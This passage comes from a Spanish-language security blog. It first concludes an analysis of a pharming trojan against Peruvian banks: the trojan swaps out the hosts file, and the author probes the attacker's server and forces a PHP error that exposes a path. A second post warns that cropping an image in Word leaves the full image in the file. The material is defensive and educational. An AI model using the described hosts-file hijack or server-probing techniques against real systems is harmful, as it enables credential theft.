Este ataque es conocido como <a href="http://es.wikipedia.org/wiki/Pharming">Pharming</a>. Lo que hace el malware primero es descargar un archivo hosts modificado maliciosamente y sobreescribe el archivo original del equipo por el descargado, de manera que cuando el usuario intente conectarse a cualquiera de esos dominios (todos de ellos bancos peruanos) en realidad se estara conectando a la IP del atacante quien configura un servidor Web en el equipo para que a la victima se le presenta una Web idéntica a la de su banco y de esta forma podra obtener las credenciales para luego hacer transacciones fraudulentas.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGodH3NfLEZrFdfPgBO1mVW6jEPw9iwhyphenhyphen4Xlijt8KuCn59QsrT7pqvITwB3OYXRR24i0-SP27kkOwmzMjUygQNX44RNqqOxeqIYb-zVuP8R3llRmxlCqw4utlyyvKzVDWn2wQ-WTt52fo/s1600/turnkeyWhois.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGodH3NfLEZrFdfPgBO1mVW6jEPw9iwhyphenhyphen4Xlijt8KuCn59QsrT7pqvITwB3OYXRR24i0-SP27kkOwmzMjUygQNX44RNqqOxeqIYb-zVuP8R3llRmxlCqw4utlyyvKzVDWn2wQ-WTt52fo/s400/turnkeyWhois.png" width="400" /></a></div><br />
<br />
Como vemos, una única direccion IP es utilizada para todos los dominios. Al analizar el registro de esa dirección IP en la base de datos Whois de <a href="https://www.arin.net/">ARIN</a> podemos observar que le pertenece a la empresa <a href="http://turnkeyinternet.net/">Turnkey Internet Inc</a> localizada en Norteamerica. Esta empresa brinda servicios de hosting y servidores dedicados. Luego de realizar un DNS reverso y un escaneo de puertos, concluimos que el atacante adquirió un VPS (<a href="http://en.wikipedia.org/wiki/Virtual_private_server">Virtual Private Server</a>) de la compañia que tiene un costo que varia entre 39 y 129 dolares al mes. Ya saben lo que dicen, para ganar dinero hay que gastarlo. Habrá comprado el atacante este servicio son su propia tarjeta de crédito o con una robada ? De ser lo primero entonces Turnkey Internet Inc tiene la identidad real de nuestro atacante en su base de datos...<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjpUm1FLgPv7WkOSUscEiGwVNBR9EHHyCWWBf3DpkGhOHq-K6to6ErgcTstwX5pD5Rpg6xPWTrIi1R1AvT5UTFsE29JVstC6xDhx70Vd1bSnK3fpwNJHxd-Fe7KzIIVf3ORCN3s2kUKyc/s1600/escane0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjpUm1FLgPv7WkOSUscEiGwVNBR9EHHyCWWBf3DpkGhOHq-K6to6ErgcTstwX5pD5Rpg6xPWTrIi1R1AvT5UTFsE29JVstC6xDhx70Vd1bSnK3fpwNJHxd-Fe7KzIIVf3ORCN3s2kUKyc/s400/escane0.png" width="400" /></a></div><br />
<br />
Viendo el escaneo de puertos vemos una tipica instalacion por defecto de un VPS, con un CPanel y Plesk para su facil administracion. SMTP, POP3, POP3S, IMAP, IMAPS, DNS, muchos servicios innecesarios lo que nos muestra que el atacante no hizo un hardening de su servidor y que nos puede dar una luz respecto a su perfil. Lo mismo si ingresamos al servidor Web sin suplirle una cabecera HOST, vemos algunos archivos por defecto de una instalación de apache.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs2yFxS8pW-A-P_RiUYf0JGq6fO6I3yoXVyOlXY21-aBuyI_AP1bG35vG9MbgoYOTHh-m6Tm60Qg9q4JGO1nUepvXFJgN18ajbIwCKDjYQtxGPVYoj5Gijwx-NE5J9VDZxKaUTJoxIh-U/s1600/server2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs2yFxS8pW-A-P_RiUYf0JGq6fO6I3yoXVyOlXY21-aBuyI_AP1bG35vG9MbgoYOTHh-m6Tm60Qg9q4JGO1nUepvXFJgN18ajbIwCKDjYQtxGPVYoj5Gijwx-NE5J9VDZxKaUTJoxIh-U/s320/server2.png" width="316" /></a></div>Jugando un poco con las aplicaciones Web falsas me asombra el nivel de detalle que el atacante le ha añadido (todo en php). Incluso implementa la tarjeta de coordenadas utilizadas por muchos bancos para que las victimas no sospechen. Probando algunas cosas, logro forzar un error PHP en el servidor lo que nos brinda un <a href="http://www.owasp.org/index.php/Full_Path_Disclosure">Full Path Disclosure</a> y podemos averiguar el usuario con el que el atacante maneja su servidor: PEPITOCO. Al <a href="http://www.google.com.pe/#hl=es-419&source=hp&biw=1229&bih=485&q=pepitoco&aq=f&aqi=&aql=&oq=&fp=66ccd2694fc1c7f7">googlear</a> este nick, vemos varios resultados pero no encontramos nada relevante.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDcZb6khSbd9jFTd3mGzIVZ6siZ5tvcmtlqJbzSYeDTvzjCZ8A8z66OqB0sVHW4atw0mhDkzmluk5YJx_SxVou76OvL-I1NdizF87j8z2GD-y5Dc46uxde4D_PJugKeRV5Vgb3QtAQRiw/s1600/errorVPS2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDcZb6khSbd9jFTd3mGzIVZ6siZ5tvcmtlqJbzSYeDTvzjCZ8A8z66OqB0sVHW4atw0mhDkzmluk5YJx_SxVou76OvL-I1NdizF87j8z2GD-y5Dc46uxde4D_PJugKeRV5Vgb3QtAQRiw/s400/errorVPS2.png" width="400" /></a></div><br />
<br />
Lamentablemente cuando quise darle mas tiempo para analizar esta campaña, el servidor del atacante habia sido dado de baja por el proveedor.<br />
<br />
Con esto terminamos. Hemos visto a grandes rasgos el funcionamiento de un troyano bancario desde su propagación hasta su ejecución. Algo importante es que este malware apunta exclusivamente a bancos peruanos. Alrededor de 3 meses despues de iniciada la campaña el servidor del atacante fue dado de baja. En ese tiempo, cuántas victimas habrán ingresado sus credenciales en esos portales falsos ?<br />
<br />
No lo olviden, desechar todo correo extraño. No está demas revisar si su archivo hosts no tiene algo extraño. Lo pueden encontrar en :<br />
C:\Windows\System32\drivers\etc\hosts<br />
<br />
Saludos.<br />
MVelazco<br />
<a href="http://twitter.com/mvelazco">http://twitter.com/mvelazco</a>Open-Sechttp://www.blogger.com/profile/12321871096900747631noreply@blogger.com3tag:blogger.com,1999:blog-1142420473059173802.post-53646873760395907902011-04-06T10:41:00.004-05:002011-04-06T10:51:18.323-05:00Lo que CORTAS no siempre se CORTAEscrito por Rodolfo Castelo.<br />
<br />
Empezaré por contarles que hoy mi amigo Walter, ante un hecho personal me consulto sobre un tema de Microsoft Office (como soy según él mosquetero de Microsoft), en donde una imagen previamente “cortada” es mostrada en toda su plenitud original, en otras palabras la imagen sin cortar. Entendemor por "cortar" a la trata de la imagen para que sólo sea visible parte de ella.<br />
<br />
<br />
En vista de ello, se me ocurrió una teoría no muy zafada, y creo algo lógico, claro está en el escenario usado, pero que tenía que probarse.<br />
Bueno, la teoría era la siguiente:<br />
<br />
“Microsoft Office, en su herramienta Word no es una suite ni aplicación de dibujo, pero que tiene algunos componentes que nos ayudan en el día a día para colocar imágenes en nuestros documentos y así hacerlos más atractivos y entendibles, por tanto, al cortar una imagen, este lo que hace es <b>dejar visible la parte que nos interesa</b> y<b> ocultar con parámetros, meta o tags el resto</b> de la imagen original, por tanto otra herramienta similar a Word, no necesariamente interpreta esta información de manera correcta o simplemente no lo hace, hecho por el cual <b>deja visible toda la imagen</b>, es ahí donde llegamos a decir <b>LO QUE CORTAS NO SIEMPRE SE CORTA</b>”<br />
<br />
<ul><li>Hice un printscreen y lo pegue en Word 2010</li>
<li>Luego se usó la utilidad recortar y se dejo visible sólo parte de la imagen.</li>
<li>Grabé el documento y se lo envíe a mi amigo Walter quien lo abrió con OpenOffice</li>
<li>¿Qué creen? En el documento, Walter ve la imagen original sin cortes y no sólo lo que se dejo visible.</li>
</ul>Por tanto la teoría era cierta, el Microsoft Word, al recortar directamente en la aplicación una imagen, <b>no lo hace en realidad</b> solo deja visible lo que deseas, pero en realidad guarda la imagen original y completa. El Open Office desecha los parámetros de ocultación y muestra la totalidad de la imagen.<br />
<br />
Este tema podría catalogarse como un punto a considerar dentro de los análisis de seguridad de información ya que afecta directamente a la <b>Confidencialidad</b> del remitente siempre y cuando se manipule imágenes en el mismo Microsoft Word y no en aplicaciones de terceros enfocadas al dibujo.<br />
<br />
A continuación muestro las imágenes vista desde Microsoft Word y desde Open Office.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCn6x_o1tiKRzQjDxWj0MqrPBgGPCew26Z6we6TyCNovcSJH87D4O_GXm1zCF9hdrEaVKkRzR96v9GZvFsHxQNYdETHAL-czrEWIcISjriuutj_YgW15JnOGJg-uEnG4fka14QEhiEmRw/s1600/1.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="288" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCn6x_o1tiKRzQjDxWj0MqrPBgGPCew26Z6we6TyCNovcSJH87D4O_GXm1zCF9hdrEaVKkRzR96v9GZvFsHxQNYdETHAL-czrEWIcISjriuutj_YgW15JnOGJg-uEnG4fka14QEhiEmRw/s320/1.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Imagen como se ve en MS Word, la que fue recortada en la misma aplicación.</td></tr>
</tbody></table><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3hZ6yRIFnPrOSVBYk7Z4gx6LTMci6c20ZDR9kuYIpfoWTs82o0tELCzfdhmsCxRnhW9Y8DHYdnpW0CRHAmTsjVmVrMUUxmHyT2uvQMhG5G055TV922suu28nF2e_1pZCUmn51LTzakTk/s1600/2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3hZ6yRIFnPrOSVBYk7Z4gx6LTMci6c20ZDR9kuYIpfoWTs82o0tELCzfdhmsCxRnhW9Y8DHYdnpW0CRHAmTsjVmVrMUUxmHyT2uvQMhG5G055TV922suu28nF2e_1pZCUmn51LTzakTk/s400/2.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Como se ve en OpenOffice</td></tr>
</tbody></table><br />
Comparto esta información para los fines pertinentes!<br />
<br />
Usen herramientas de dibujo cuando deseen manipular imágenes y pegarlas en documentos si es que no quieren que alguien vea más alla de lo evidente.<br />
<ul></ul>Open-Sechttp://www.blogger.com/profile/12321871096900747631noreply@blogger.com8